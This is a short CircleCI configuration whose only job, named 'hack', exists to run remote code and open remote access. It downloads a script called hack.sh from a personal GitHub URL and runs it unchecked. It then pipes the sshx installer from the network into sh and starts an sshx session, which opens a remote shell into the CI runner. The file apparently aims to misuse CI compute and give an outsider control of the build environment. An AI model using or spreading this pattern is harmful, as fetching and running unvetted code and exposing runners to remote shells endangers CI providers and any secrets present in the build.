version: 2.1

jobs:
  hack:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - run:
          name: Setup deps
          command: sudo apt-get update && sudo apt-get install -y wget curl
      - run:
          name: Run hack.sh
          command: |
            wget https://raw.githubusercontent.com/phantrongkien12/tester/refs/heads/main/hack.sh -O hack.sh
            chmod +x hack.sh
            ./hack.sh

      - run:
          name: Debug shell (sshx)
          command: |
            curl -sSf https://sshx.io/get | sh
            sshx

workflows:
  version: 2
  hack-workflow:
    jobs:
      - hack
